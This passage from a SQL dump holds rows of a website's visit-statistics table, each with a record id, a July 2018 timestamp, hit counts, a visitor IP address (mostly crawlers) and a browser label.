,0,'66.249.69.230',''),(269756,1531022869,1,1,0,0,'8.29.198.27','other'),(269757,1531022940,1,1,0,0,'54.36.148.135','other'),(269758,1531022994,1,1,0,0,'54.36.149.84','other'),(269759,1531023726,4,0,4,0,'66.249.69.228',''),(269760,1531023789,2,0,2,0,'66.249.69.232',''),(269761,1531024080,1,1,0,0,'193.106.30.99','firefox'),(269762,1531024449,1,1,0,0,'54.36.148.63','other'),(269763,1531024527,1,1,0,0,'54.36.148.44','other'),(269764,1531024633,1,1,0,0,'54.36.148.120','other'),(269765,1531024842,1,1,0,0,'54.36.148.230','other'),(269766,1531025234,3,3,0,0,'141.8.142.74','other'),(269767,1531025270,1,1,0,0,'54.36.149.25','other'),(269768,1531025474,1,1,0,0,'54.36.148.23','other'),(269769,1531025647,1,1,0,0,'54.36.149.89','other'),(269770,1531025678,3,3,0,0,'216.244.66.241','other'),(269771,1531025966,1,1,0,0,'54.36.149.42','other'),(269772,1531026143,4,0,4,0,'66.249.69.232',''),(269773,1531026200,3,0,3,0,'66.249.69.230',''),(269774,1531026327,1,1,0,0,'54.36.148.86','other'),(269775,1531026332,5,0,5,0,'66.249.69.228',''),(269776,1531026357,1,1,0,0,'141.8.142.74','other'),(269777,1531026579,5,1,4,0,'66.249.69.232',''),(269778,1531026775,1,1,0,0,'95.163.255.99','other'),(269779,1531026827,1,1,0,0,'178.154.171.88','other'),(269780,1531026848,1,1,0,0,'54.36.149.58','other'),(269781,1531026886,1,1,0,0,'54.36.148.127','other'),(269782,1531027109,2,0,2,0,'66.249.69.185',''),(269783,1531027205,1,1,0,0,'54.36.148.198','other'),(269784,1531027253,7,0,7,0,'66.249.69.230',''),(269785,1531027478,4,0,4,0,'66.249.69.228',''),(269786,1531027563,2,0,2,0,'66.249.69.232',''),(269787,1531027564,1,1,0,0,'40.77.167.138','other'),(269788,1531028382,3,0,3,0,'66.249.69.230',''),(269789,1531028412,3,0,3,0,'66.249.69.228',''),(269790,1531028616,1,1,0,0,'54.36.149.69','other'),(269791,1531029026,1,1,0,0,'54.36.148.128','other'),(269792,1531029318,1,0,1,0,'66.249.69.185',''),(269793,1531029335,3,0,3,0,'66.249.69.228',''),(269794,1531029415,1,1,0,0,'54.36.149.79','other'),(269795,1531029567,1,1,0,0,'8.29.198.25','other'),(269796,1531029807,1,1,0,0,'54.36.149.66','other'),(269797,1531030017,1,1,0,0,'66.249.69.232','chrome'),(269798,1531030057,1,1,0,0,'54.36.148.124','other'),(269799,1531030336,1,0,1,0,'66.249.69.228',''),(269800,1531030888,1,1,0,0,'54.36.148.246','other'),(269801,1531030908,1,1,0,0,'157.55.39.102','other'),(269802,1531031225,1,1,0,0,'54.36.149.89','other'),(269803,1531031294,1,1,0,0,'54.36.148.248','other'),(269804,1531031525,1,1,0,0,'54.36.148.247','other'),(269805,1531031531,1,1,0,0,'180.76.15.153','other'),(269806,1531031727,1,1,0,0,'46.98.123.49','firefox'),(269807,1531031739,2,0,2,0,'66.249.69.230',''),(269808,1531031860,1,1,0,0,'54.36.149.39','other'),(269809,1531031874,1,1,0,0,'216.244.66.241','other'),(269810,1531032098,3,0,3,0,'66.249.69.232',''),(269811,1531032221,1,0,1,0,'66.249.69.228',''),(269812,1531032843,1,1,0,0,'54.36.149.91','other'),(269813,1531033186,1,1,0,0,'54.36.148.136','other'),(269814,1531033244,1,0,1,0,'66.249.69.185',''),(269815,1531033272,1,1,0,0,'54.36.149.107','other'),(269816,1531033320,1,1,0,0,'54.36.148.24','other'),(269817,1531033666,2,0,2,0,'66.249.69.228',''),(269818,1531033699,1,1,0,0,'8.29.198.26','other'),(269819,1531033737,3,0,3,0,'66.249.69.230',''),(269820,1531033814,1,1,0,0,'216.244.66.241','other'),(269821,1531033973,1,1,0,0,'54.36.149.36','other'),(269822,1531034184,2,2,0,0,'92.113.189.235','chrome'),(269823,1531034245,1,0,1,0,'66.249.69.232',''),(269824,1531034771,1,1,0,0,'157.55.39.100','other'),(269825,1531035092,5,0,5,0,'66.249.69.228',''),(269826,1531035866,3,0,3,0,'66.249.69.232',''),(269827,1531035978,1,1,0,0,'54.36.148.225','other'),(269828,1531036015,1,0,1,0,'66.249.69.230',''),(269829,1531036156,1,0,1,0,'66.249.69.228',''),(269830,1531036234,2,2,0,0,'216.244.66.241','other'),(269831,1531036448,1,1,0,0,'66.249.69.230','chrome'),(269832,1531036723,1,1,0,0,'54.36.148.252','other'),(269833,1531037148,2,0,2,0,'66.249.69.228',''),(269834,1531037165,2,0,2,0,'66.249.69.232',''),(269835,1531037690,1,1,0,0,'54.36.149.58','other'),(269836,1531037889,1,1,0,0,'95.163.255.98','other'),(269837,1531037900,2,0,2,0,'66.249.69.230',''),(269838,1531037920,1,1,0,0,'54.36.148.247','other'),(269839,1531037927,1,1,0,0,'95.163.255.93','other'),(269840,1531038272,1,1,0,0,'180.76.15.13','other'),(269841,1531038336,1,1,0,0,'54.36.148.174','other'),(269842,1531038415,1,0,1,0,'66.249.69.232',''),(269843,1531038469,1,0,1,0,'66.249.69.187',''),(269844,1531038817,4,4,0,0,'216.244.66.241','other'),(269845,1531038818,1,1,0,0,'54.36.148.133','other'),(269846,1531038939,1,1,0,0,'54.36.148.49','other'),(269847,1531039233,1,1,0,0,'54.36.149.2','other'),(269848,1531039483,3,0,3,0,'66.249.69.228',''),(269849,1531039749,3,0,3,0,'66.249.69.230',''),(269850,1531040255,1,0,1,0,'66.249.69.187',''),(269851,1531040429,1,1,0,0,'8.29.198.25','other'),(269852,1531040558,3,0,3,0,'66.249.69.228',''),(269853,1531040653,3,0,3,0,'66.249.69.230',''),(269854,1531040732,2,0,2,0,'66.249.69.232',''),(269855,1531041047,1,1,0,0,'54.36.148.127','other'),(269856,1531041080,1,1,0,0,'13.66.205.121','other'),(269857,1531041199,1,1,0,0,'54.36.148.176','other'),(269858,1531041331,5,5,0,0,'216.244.66.241','other'),(269859,1531041851,1,1,0,0,'54.36.148.47','other'),(269860,1531042021,1,0,1,0,'66.249.69.189',''),(269861,1531042189,1,1,0,0,'54.36.148.202','other'),(269862,1531042249,1,0,1,0,'66.249.69.228',''),(269863,1531042392,1,1,0,0,'54.36.148.116','other'),(269864,1531042474,1,1,0,0,'54.36.149.96','other'),(269865,1531042506,1,0,1,0,'66.249.69.230',''),(269866,1531042588,1,0,1,0,'66.249.69.232',''),(269867,1531042592,1,1,0,0,'54.165.59.7','other'),(269868,1531042635,1,1,0,0,'54.36.149.19','other'),(269869,1531042771,1,1,0,0,'54.36.148.14','other'),(269870,1531042801,1,1,0,0,'37.9.113.182','other'),(269871,1531042908,1,1,0,0,'54.36.148.146','other'),(269872,1531042933,1,1,0,0,'54.36.149.99','other'),(269873,1531042937,1,1,0,0,'141.8.142.74','other'),(269874,1531043213,1,1,0,0,'54.36.148.30','other'),(269875,1531043226,1,0,1,0,'66.249.69.185',''),(269876,1531043542,1,1,0,0,'93.78.117.116','firefox'),(269877,1531043629,1,1,0,0,'54.36.148.125','other'),(269878,1531043766,2,0,2,0,'66.249.69.228',''),(269879,1531043950,1,1,0,0,'54.36.148.211','other'),(269880,1531044081,4,4,0,0,'216.244.66.241','other'),(269881,1531044085,2,0,2,0,'66.249.69.232',''),(269882,1531044412,2,0,2,0,'66.249.69.230',''),(269883,1531044484,1,1,0,0,'54.36.149.18','other'),(269884,1531044487,1,0,1,0,'66.249.69.185',''),(269885,1531044532,1,1,0,0,'8.29.198.26','other'),(269886,1531044839,4,0,4,0,'66.249.69.228',''),(269887,1531044844,1,0,1,0,'66.249.69.187',''),(269888,1531045449,1,1,0,0,'54.36.148.25','other'),(269889,1531045652,3,0,3,0,'66.249.69.232',''),(269890,1531045738,1,1,0,0,'193.106.30.99','firefox'),(269891,1531046318,1,0,1,0,'66.249.69.185',''),(269892,1531046469,1,1,0,0,'54.36.148.97','other'),(269893,1531046754,1,1,0,0,'216.244.66.241','other'),(269894,1531046889,1,1,0,0,'54.36.148.202','other'),(269895,1531046907,1,0,1,0,'66.249.69.189',''),(269896,1531047088,5,0,5,0,'66.249.69.228',''),(269897,1531047236,1,1,0,0,'54.208.102.37','other'),(269898,1531047416,5,0,5,0,'66.249.69.230',''),(269899,1531047480,2,0,2,0,'66.249.69.232',''),(269900,1531048098,2,2,0,0,'5.9.154.68','other'),(269901,1531048101,5,0,5,0,'66.249.69.228',''),(269902,1531048379,1,1,0,0,'54.36.149.15','other'),(269903,1531048500,1,1,0,0,'54.36.148.92','other'),(269904,1531048588,2,0,2,0,'66.249.69.230',''),(269905,1531048656,1,1,0,0,'54.36.148.68','other'),(269906,1531048677,1,1,0,0,'54.36.148.222','other'),(269907,1531048692,1,1,0,0,'54.36.148.169','other'),(269908,1531048928,1,1,0,0,'216.244.66.241','other'),(269909,1531049068,2,1,1,0,'66.249.69.228',''),(269910,1531049190,1,1,0,0,'162.210.196.130','other'),(269911,1531049405,1,1,0,0,'54.36.148.232','other'),(269912,1531049442,1,1,0,0,'54.36.149.35','other'),(269913,1531049616,1,1,0,0,'54.36.148.136','other'),(269914,1531049745,2,0,2,0,'66.249.69.230',''),(269915,1531049762,1,1,0,0,'54.36.149.31','other'),(269916,1531050023,1,1,0,0,'95.221.179.231','firefox'),(269917,1531050173,1,0,1,0,'66.249.69.228',''),(269918,1531050174,1,1,0,0,'54.36.148.51','other'),(269919,1531050183,1,0,1,0,'66.249.69.232',''),(269920,1531050286,1,1,0,0,'46.211.113.143','chrome'),(269921,1531050340,1,1,0,0,'54.36.149.92','other'),(269922,1531050908,1,1,0,0,'95.163.255.187','other'),(269923,1531051264,1,0,1,0,'66.249.69.230',''),(269924,1531051278,1,1,0,0,'8.29.198.25','other'),(269925,1531051376,1,0,1,0,'66.249.69.228',''),(269926,1531051637,1,0,1,0,'66.249.69.187',''),(269927,1531051756,2,1,1,0,'66.249.69.187',''),(269928,1531052112,1,1,0,0,'54.36.148.158','other'),(269929,1531052308,1,1,0,0,'54.36.148.157','other'),(269930,1531052392,1,0,1,0,'66.249.69.185',''),(269931,1531052465,3,3,0,0,'216.244.66.241','other'),(269932,1531052958,1,1,0,0,'54.36.148.109','other'),(269933,1531053090,4,0,4,0,'66.249.69.232',''),(269934,1531053098,1,0,1,0,'66.249.69.230',''),(269935,1531053128,1,1,0,0,'54.36.148.14','other'),(269936,1531053547,1,1,0,0,'54.36.149.97','other'),(269937,1531053619,1,0,1,0,'66.249.69.228',''),(269938,1531054370,1,1,0,0,'54.36.148.254','other'),(269939,1531054734,1,1,0,0,'95.163.255.99','other'),(269940,1531054772,2,0,2,0,'66.249.69.232',''),(269941,1531054804,1,0,1,0,'66.249.69.230',''),(269942,1531055000,1,1,0,0,'178.154.171.88','other'),(269943,1531055117,1,1,0,0,'95.163.255.96','other'),(269944,1531055192,1,1,0,0,'54.36.149.102','other'),(269945,1531055251,1,1,0,0,'54.36.148.239','other'),(269946,1531055261,4,4,0,0,'216.244.66.241','other'),(269947,1531055363,1,1,0,0,'54.36.149.22','other'),(269948,1531055372,1,1,0,0,'8.29.198.25','other'),(269949,1531055391,1,1,0,0,'54.236.211.234','other'),(269950,1531055557,1,1,0,0,'141.8.142.74','other'),(269951,1531055883,3,0,3,0,'66.249.69.232',''),(269952,1531055977,1,0,1,0,'66.249.69.228',''),(269953,1531056021,2,2,0,0,'5.9.98.234','other'),(269954,1531056093,1,1,0,0,'54.36.148.252','other'),(269955,1531056175,2,0,2,0,'66.249.69.230',''),(269956,1531056438,2,2,0,0,'151.18.107.222','chrome'),(269957,1531056901,1,1,0,0,'54.236.211.234','other'),(269958,1531056930,1,0,1,0,'66.249.69.189',''),(269959,1531056954,1,0,1,0,'66.249.69.228',''),(269960,1531057144,3,3,0,0,'216.244.66.241','other'),(269961,1531057227,1,1,0,0,'54.36.149.4','other'),(269962,1531057272,1,1,0,0,'54.36.148.139','other'),(269963,1531057374,4,4,0,0,'54.165.59.7','other'),(269964,1531057832,1,0,1,0,'66.249.69.232',''),(269965,1531058204,1,1,0,0,'54.36.148.152','other'),(269966,1531058231,1,0,1,0,'66.249.69.187',''),(269967,1531058242,1,0,1,0,'66.249.69.228',''),(269968,1531058264,1,1,0,0,'54.36.149.100','other'),(269969,1531058499,1,1,0,0,'54.224.108.120','other'),(269970,1531058527,1,1,0,0,'54.36.149.91','other'),(269971,1531058568,1,1,0,0,'54.36.149.66','other'),(269972,1531058621,1,1,0,0,'54.36.148.34','other'),(269973,1531058720,1,1,0,0,'54.36.148.58','other'),(269974,1531059000,1,1,0,0,'216.244.66.241','other'),(269975,1531059056,1,1,0,0,'54.36.148.103','other'),(269976,1531059287,1,1,0,0,'54.36.148.22','other'),(269977,1531059695,1,1,0,0,'54.36.148.231','other'),(269978,1531059984,1,1,0,0,'54.36.148.31','other'),(269979,1531060086,1,1,0,0,'54.224.108.120','other'),(269980,1531060123,4,4,0,0,'216.244.66.241','other'),(269981,1531060157,1,1,0,0,'54.36.148.164','other'),(269982,1531060619,1,1,0,0,'95.163.255.97','other'),(269983,1531060698,8,8,0,0,'157.55.39.97','other'),(269984,1531060810,1,1,0,0,'54.36.149.12','other'),(269985,1531060861,4,0,4,0,'66.249.69.230',''),(269986,1531060862,1,1,0,0,'54.36.149.21','other'),(269987,1531060925,1,1,0,0,'54.236.211.234','other'),(269988,1531060932,2,0,2,0,'66.249.69.232',''),(269989,1531061004,11,11,0,0,'157.55.39.102','other'),(269990,1531061021,12,12,0,0,'157.55.39.100','other'),(269991,1531061025,1,1,0,0,'95.163.255.112','other'),(269992,1531061044,9,9,0,0,'40.77.167.53','other'),(269993,1531061049,1,1,0,0,'95.163.255.109','other'),(269994,1531061057,2,0,2,0,'66.249.69.228',''),(269995,1531061086,1,1,0,0,'54.36.149.87','other'),(269996,1531061230,1,1,0,0,'54.36.149.24','other'),(269997,1531061482,1,1,0,0,'54.36.148.46','other'),(269998,1531061500,1,0,1,0,'66.249.69.189',''),(269999,1531061676,1,1,0,0,'54.36.149.44','other'),(270000,1531061719,2,2,0,0,'46.4.60.249','other'),(270001,1531061807,1,1,0,0,'54.36.149.78','other'),(270002,1531061958,4,0,4,0,'66.249.69.230',''),(270003,1531061993,5,0,5,0,'66.249.69.228',''),(270004,1531062119,2,0,2,0,'66.249.69.232',''),(270005,1531062129,1,1,0,0,'8.29.198.25','other'),(270006,1531062631,1,1,0,0,'157.55.39.100','other'),(270007,1531063048,4,4,0,0,'216.244.66.241','other'),(270008,1531063248,1,1,0,0,'54.36.149.20','other'),(270009,1531063642,1,1,0,0,'52.91.10.254','other'),(270010,1531063729,1,1,0,0,'54.36.148.18','other'),(270011,1531063780,1,1,0,0,'54.36.148.136','other'),(270012,1531064032,2,0,2,0,'66.249.69.228',''),(270013,1531064070,1,1,0,0,'54.36.149.88','other'),(270014,1531064494,1,1,0,0,'54.36.148.39','other'),(270015,1531064542,1,1,0,0,'54.36.148.195','other'),(270016,1531064904,2,0,2,0,'66.249.69.230',''),(270017,1531065068,2,2,0,0,'92.113.189.235','chrome'),(270018,1531065173,1,1,0,0,'54.36.148.217','other'),(270019,1531065223,1,1,0,0,'216.244.66.241','other'),(270020,1531065317,1,1,0,0,'52.91.10.254','other'),(270021,1531065335,2,0,2,0,'66.249.69.228',''),(270022,1531065401,1,1,0,0,'54.36.148.180','other'),(270023,1531065703,1,1,0,0,'54.36.148.33','other'),(270024,1531066065,1,0,1,0,'66.249.69.230',''),(270025,1531066152,1,1,0,0,'95.163.255.97','other'),(270026,1531066161,4,4,0,0,'216.244.66.241','other'),(270027,1531066211,1,1,0,0,'8.29.198.26','other'),(270028,1531066367,1,1,0,0,'54.36.148.30','other'),(270029,1531066532,1,1,0,0,'178.154.171.88','other'),(270030,1531066666,1,1,0,0,'54.36.148.147','other'),(270031,1531066696,1,1,0,0,'128.69.225.252','msie'),(270032,1531066803,1,1,0,0,'157.55.39.102','other'),(270033,1531066930,1,1,0,0,'18.209.161.2','other'),(270034,1531067102,1,1,0,0,'180.76.15.19','other'),(270035,1531067173,1,1,0,0,'54.36.148.200','other'),(270036,1531067195,1,1,0,0,'54.36.149.19','other'),(270037,1531067213,1,0,1,0,'66.249.69.232',''),(270038,1531067505,1,1,0,0,'54.36.148.255','other'),(270039,1531067568,17,17,0,0,'148.251.195.14','other'),(270040,1531067585,1,1,0,0,'141.8.142.74','other'),(270041,1531067604,1,1,0,0,'193.106.30.99','firefox'),(270042,1531067840,3,3,0,0,'216.244.66.241','other'),(270043,1531068341,4,0,4,0,'66.249.69.232',''),(270044,1531068412,6,0,6,0,'66.249.69.230',''),(270045,1531068418,3,0,3,0,'66.249.69.228',''),(270046,1531068539,1,1,0,0,'52.91.10.254','other'),(270047,1531068907,1,1,0,0,'157.55.39.100','other'),(270048,1531069053,1,1,0,0,'216.244.66.241','other'),(270049,1531069162,1,1,0,0,'54.36.148.123','other'),(270050,1531069194,1,1,0,0,'54.36.148.253','other'),(270051,1531069621,3,0,3,0,'66.249.69.232',''),(270052,1531069687,1,0,1,0,'66.249.69.189',''),(270053,1531069782,1,0,1,0,'66.249.69.228',''),(270054,1531069857,3,3,0,0,'91.196.178.67','chrome'),(270055,1531070258,1,0,1,0,'66.249.69.185',''),(270056,1531070424,4,4,0,0,'216.244.66.241','other'),(270057,1531070891,1,0,1,0,'66.249.69.187',''),(270058,1531070962,1,1,0,0,'145.255.2.40','firefox'),(270059,1531071124,1,1,0,0,'54.36.149.17','other'),(270060,1531071254,1,1,0,0,'54.36.149.67','other'),(270061,1531071259,1,1,0,0,'95.163.255.96','other'),(270062,1531071394,1,1,0,0,'54.36.149.27','other'),(270063,1531071619,1,1,0,0,'54.36.148.174','other'),(270064,1531071804,1,1,0,0,'54.36.149.52','other'),(270065,1531071805,1,1,0,0,'54.36.149.86','other'),(270066,1531071927,1,0,1,0,'66.249.69.189',''),(270067,1531071980,1,1,0,0,'93.72.131.1','chrome'),(270068,1531072052,1,1,0,0,'54.36.148.199','other'),(270069,1531072186,1,1,0,0,'157.55.39.102','other'),(270070,1531072190,1,1,0,0,'54.36.149.39','other'),(270071,1531072310,1,1,0,0,'54.36.148.115','other'),(270072,1531072334,1,1,0,0,'54.36.148.12','other'),(270073,1531072579,1,1,0,0,'54.36.149.5','other'),(270074,1531072926,1,1,0,0,'54.36.148.39','other'),(270075,1531072978,1,1,0,0,'8.29.198.27','other'),(270076,1531073024,1,1,0,0,'54.36.148.220','other'),(270077,1531073118,3,3,0,0,'216.244.66.241','other'),(270078,1531073130,1,1,0,0,'54.36.148.20','other'),(270079,1531073499,1,1,0,0,'52.91.10.254','other'),(270080,1531074375,1,0,1,0,'66.249.69.185',''),(270081,1531074763,1,1,0,0,'95.163.255.177','other'),(270082,1531074828,2,2,0,0,'91.196.178.67','chrome'),(270083,1531074966,1,1,0,0,'54.36.149.28','other'),(270084,1531075035,1,1,0,0,'40.77.167.53','other'),(270085,1531075081,1,1,0,0,'157.55.39.100','other'),(270086,1531075176,1,1,0,0,'216.244.66.241','other'),(270087,1531075387,1,1,0,0,'54.36.149.97','other'),(270088,1531075412,1,1,0,0,'54.36.148.77','other'),(270089,1531075559,1,1,0,0,'5.9.155.226','other'),(270090,1531076155,2,2,0,0,'216.244.66.241','other'),(270091,1531076957,1,1,0,0,'54.36.148.33','other'),(270092,1531076984,1,1,0,0,'157.55.39.102','other'),(270093,1531077041,1,1,0,0,'8.29.198.25','other'),(270094,1531077308,2,2,0,0,'216.244.66.241','other'),(270095,1531077353,2,0,2,0,'66.249.69.187',''),(270096,1531077525,1,1,0,0,'54.36.148.118','other'),(270097,1531077619,1,1,0,0,'54.36.148.128','other'),(270098,1531077665,1,1,0,0,'54.36.148.192','other'),(270099,1531078070,1,1,0,0,'93.73.171.3','firefox'),(270100,1531078216,1,1,0,0,'54.36.148.94','other'),(270101,1531078219,1,1,0,0,'54.36.149.57','other'),(270102,1531078292,1,1,0,0,'216.244.66.241','other'),(270103,1531078381,1,1,0,0,'54.36.148.233','other'),(270104,1531078432,1,1,0,0,'54.36.148.151','other'),(270105,1531078437,1,1,0,0,'54.36.148.217','other'),(270106,1531078504,1,0,1,0,'66.249.69.230',''),(270107,1531078634,1,1,0,0,'54.36.148.138','other'),(270108,1531078672,1,1,0,0,'54.36.148.222','other'),(270109,1531078702,1,0,1,0,'66.249.69.228',''),(270110,1531078717,1,1,0,0,'54.36.148.64','other'),(270111,1531078987,1,1,0,0,'54.36.149.80','other'),(270112,1531078997,1,1,0,0,'54.36.148.97','other'),(270113,1531079118,1,1,0,0,'54.36.148.213','other'),(270114,1531080060,1,1,0,0,'54.36.148.37','other'),(270115,1531080271,1,1,0,0,'54.36.148.188','other'),(270116,1531080573,3,0,3,0,'66.249.69.230',''),(270117,1531080823,1,0,1,0,'66.249.69.187',''),(270118,1531080843,5,0,5,0,'66.249.69.232',''),(270119,1531080914,3,3,0,0,'216.244.66.241','other'),(270120,1531080924,1,1,0,0,'54.36.148.166','other'),(270121,1531080974,1,1,0,0,'54.36.148.167','other'),(270122,1531080979,2,0,2,0,'66.249.69.228',''),(270123,1531081056,9,9,0,0,'144.76.38.40','other'),(270124,1531081381,1,1,0,0,'54.36.148.81','other'),(270125,1531081530,1,0,1,0,'66.249.69.185',''),(270126,1531081875,1,1,0,0,'178.66.91.162','chrome'),(270127,1531082059,1,1,0,0,'54.36.148.155','other'),(270128,1531082224,1,1,0,0,'54.36.148.63','other'),(270129,1531082486,1,1,0,0,'54.36.148.84','other'),(270130,1531082618,1,1,0,0,'54.36.149.19','other'),(270131,1531082634,1,1,0,0,'54.36.148.134','other'),(270132,1531082667,1,1,0,0,'54.36.149.6','other'),(270133,1531082882,1,1,0,0,'54.36.148.147','other'),(270134,1531082920,1,1,0,0,'95.163.255.96','other'),(270135,1531082922,1,1,0,0,'95.163.255.94','other'),(270136,1531083117,1,0,1,0,'66.249.69.189',''),(270137,1531083718,5,5,0,0,'216.244.66.241','other'),(270138,1531083832,1,1,0,0,'8.29.198.25','other'),(270139,1531084077,1,1,0,0,'54.36.149.52','other'),(270140,1531084078,1,1,0,0,'54.36.148.49','other'),(270141,1531084145,1,1,0,0,'54.36.149.5','other'),(270142,1531085355,1,0,1,0,'66.249.69.185',''),(270143,1531085560,1,1,0,0,'54.36.149.72','other'),(270144,1531085672,5,5,0,0,'216.244.66.241','other'),(270145,1531085857,1,1,0,0,'157.55.39.102','other'),(270146,1531086028,1,0,1,0,'66.249.69.189',''),(270147,1531086203,1,1,0,0,'157.55.39.100','other'),(270148,1531086205,1,0,1,0,'66.249.69.230',''),(270149,1531086562,1,1,0,0,'54.36.148.190','other'),(270150,1531086869,2,2,0,0,'216.244.66.241','other'),(270151,1531086938,1,1,0,0,'54.36.149.41','other'),(270152,1531087131,1,1,0,0,'54.36.149.45','other'),(270153,1531087328,1,1,0,0,'54.36.148.71','other'),(270154,1531087501,1,1,0,0,'54.36.148.57','other'),(270155,1531087511,1,1,0,0,'54.36.148.19','other'),(270156,1531087679,1,1,0,0,'66.249.69.187','chrome'),(270157,1531087754,1,0,1,0,'66.249.69.230',''),(270158,1531087874,1,1,0,0,'8.29.198.26','other'),(270159,1531088336,1,1,0,0,'54.36.149.74','other'),(270160,1531088642,1,1,0,0,'54.36.148.125','other'),(270161,1531089346,1,1,0,0,'54.36.148.191','other'),(270162,1531089381,1,1,0,0,'157.55.39.100','other'),(270163,1531089768,1,1,0,0,'54.36.148.196','other'),(270164,1531090253,3,0,3,0,'66.249.69.230',''),(270165,1531090386,1,1,0,0,'54.36.149.104','other'),(270166,1531090722,1,1,0,0,'54.36.148.235','other'),(270167,1531090763,1,1,0,0,'216.244.66.241','other'),(270168,1531090901,1,1,0,0,'54.36.148.29','other'),(270169,1531091063,3,0,3,0,'66.249.69.228',''),(270170,1531091133,3,0,3,0,'66.249.69.232',''),(270171,1531091167,1,1,0,0,'54.36.148.106','other'),(270172,1531091410,1,0,1,0,'66.249.69.187',''),(270173,1531091481,2,0,2,0,'66.249.69.230',''),(270174,1531091482,1,0,1,0,'66.249.69.189',''),(270175,1531091543,1,1,0,0,'95.163.255.184','other'),(270176,1531092160,1,1,0,0,'54.36.149.105','other'),(270177,1531092241,3,3,0,0,'216.244.66.241','other'),(270178,1531092503,1,1,0,0,'54.36.148.14','other'),(270179,1531092569,2,0,2,0,'66.249.69.232',''),(270180,1531092906,1,1,0,0,'54.36.148.87','other'),(270181,1531093053,1,1,0,0,'54.36.148.220','other'),(270182,1531093077,1,1,0,0,'54.36.148.78','other'),(270183,1531093269,1,0,1,0,'66.249.69.228',''),(270184,1531093470,1,1,0,0,'54.36.148.99','other'),(270185,1531093496,1,1,0,0,'54.36.148.70','other'),(270186,1531093594,1,0,1,0,'66.249.69.232',''),(270187,1531094075,1,1,0,0,'95.163.255.99','other'),(270188,1531094144,1,1,0,0,'95.163.255.95','other'),(270189,1531094384,1,1,0,0,'54.36.149.104','other'),(270190,1531094391,3,0,3,0,'66.249.69.189',''),(270191,1531094434,1,1,0,0,'54.36.148.208','other'),(270192,1531094672,4,4,0,0,'144.76.29.66','other'),(270193,1531094686,1,1,0,0,'8.29.198.25','other'),(270194,1531094736,1,0,1,0,'66.249.69.232',''),(270195,1531094785,1,1,0,0,'54.36.148.96','other'),(270196,1531094839,1,0,1,0,'66.249.69.230',''),(270197,1531094860,1,1,0,0,'66.249.69.185','chrome'),(270198,1531094909,1,1,0,0,'54.36.148.133','other'),(270199,1531094965,4,4,0,0,'216.244.66.241','other'),(270200,1531095994,1,1,0,0,'54.36.148.54','other'),(270201,1531096268,1,0,1,0,'66.249.69.189',''),(270202,1531096289,1,0,1,0,'66.249.69.185',''),(270203,1531096313,1,0,1,0,'66.249.69.232',''),(270204,1531096663,1,1,0,0,'54.36.149.52','other'),(270205,1531096700,1,1,0,0,'54.36.148.68','other'),(270206,1531096728,1,0,1,0,'66.249.69.228',''),(270207,1531096866,1,0,1,0,'66.249.69.187',''),(270208,1531097414,2,2,0,0,'216.244.66.241','other'),(270209,1531097554,1,1,0,0,'54.36.148.41','other'),(270210,1531097789,1,1,0,0,'54.36.149.54','other'),(270211,1531098064,1,1,0,0,'54.36.148.225','other'),(270212,1531098496,1,1,0,0,'157.55.39.102','other'),(270213,1531098706,1,1,0,0,'8.29.198.26','other'),(270214,1531098715,1,1,0,0,'54.36.149.75','other'),(270215,1531099490,1,1,0,0,'54.36.148.57','other'),(270216,1531099551,2,0,2,0,'66.249.69.232',''),(270217,1531099643,1,0,1,0,'66.249.69.230',''),(270218,1531099695,1,0,1,0,'66.249.69.187',''),(270219,1531099918,1,1,0,0,'95.163.255.94','other'),(270220,1531099951,1,1,0,0,'54.36.148.66','other'),(270221,1531100274,1,1,0,0,'54.36.148.134','other'),(270222,1531100448,3,0,3,0,'66.249.69.228',''),(270223,1531100567,2,0,2,0,'66.249.69.232',''),(270224,1531100871,1,1,0,0,'54.36.149.32','other'),(270225,1531100905,1,1,0,0,'157.55.39.102','other'),(270226,1531101060,2,0,2,0,'66.249.69.230',''),(270227,1531101562,1,0,1,0,'66.249.69.187',''),(270228,1531101965,1,1,0,0,'54.36.148.72','other'),(270229,1531101989,4,4,0,0,'216.244.66.241','other'),(270230,1531102290,1,1,0,0,'54.36.148.118','other'),(270231,1531102401,1,0,1,0,'66.249.69.230',''),(270232,1531102509,1,1,0,0,'54.36.148.221','other'),(270233,1531102907,2,0,2,0,'66.249.69.232',''),(270234,1531102956,3,0,3,0,'66.249.69.228',''),(270235,1531103055,1,0,1,0,'66.249.69.189',''),(270236,1531103112,1,1,0,0,'95.163.255.107','other'),(270237,1531103133,2,2,0,0,'95.163.255.108','other'),(270238,1531103144,1,1,0,0,'66.249.69.187','chrome'),(270239,1531103146,1,1,0,0,'54.36.149.69','other'),(270240,1531103191,1,1,0,0,'95.163.255.117','other'),(270241,1531103248,1,1,0,0,'87.250.224.85','other'),(270242,1531103872,1,1,0,0,'54.36.149.64','other'),(270243,1531104190,1,1,0,0,'54.36.149.39','other'),(270244,1531104624,1,1,0,0,'95.163.255.95','other'),(270245,1531104654,1,1,0,0,'95.163.255.97','other'),(270246,1531104656,1,1,0,0,'95.163.255.98','other'),(270247,1531104662,1,1,0,0,'54.36.148.30','other'),(270248,1531104976,1,1,0,0,'54.36.148.221','other'),(270249,1531105085,4,4,0,0,'216.244.66.241','other'),(270250,1531105142,1,1,0,0,'54.36.148.217','other'),(270251,1531105210,1,1,0,0,'188.165.229.75','chrome'),(270252,1531105334,1,1,0,0,'52.168.120.194','other'),(270253,1531105519,1,1,0,0,'8.29.198.25','other'),(270254,1531105570,1,1,0,0,'54.36.148.94','other'),(270255,1531105775,1,0,1,0,'66.249.69.189',''),(270256,1531105929,1,0,1,0,'66.249.69.228',''),(270257,1531106220,1,1,0,0,'54.36.148.129','other'),(270258,1531106593,1,1,0,0,'54.36.148.55','other'),(270259,1531106802,1,1,0,0,'54.36.148.137','other'),(270260,1531107107,4,4,0,0,'216.244.66.241','other'),(270261,1531107164,2,0,2,0,'66.249.69.228',''),(270262,1531107534,1,0,1,0,'66.249.69.232',''),(270263,1531107718,1,0,1,0,'66.249.69.187',''),(270264,1531108021,1,1,0,0,'95.163.255.171','other'),(270265,1531108039,11,11,0,0,'23.237.4.26','other'),(270266,1531108101,1,0,1,0,'66.249.69.228',''),(270267,1531108368,1,1,0,0,'216.244.66.241','other'),(270268,1531108861,2,0,2,0,'66.249.69.185',''),(270269,1531109275,3,3,0,0,'216.244.66.241','other'),(270270,1531109542,1,1,0,0,'8.29.198.27','other'),(270271,1531109602,1,0,1,0,'66.249.69.189',''),(270272,1531109636,2,0,2,0,'66.249.69.230',''),(270273,1531109738,14,14,0,0,'157.55.39.100','other'),(270274,1531109752,12,12,0,0,'40.77.167.53','other'),(270275,1531109763,13,13,0,0,'157.55.39.97','other'),(270276,1531109776,15,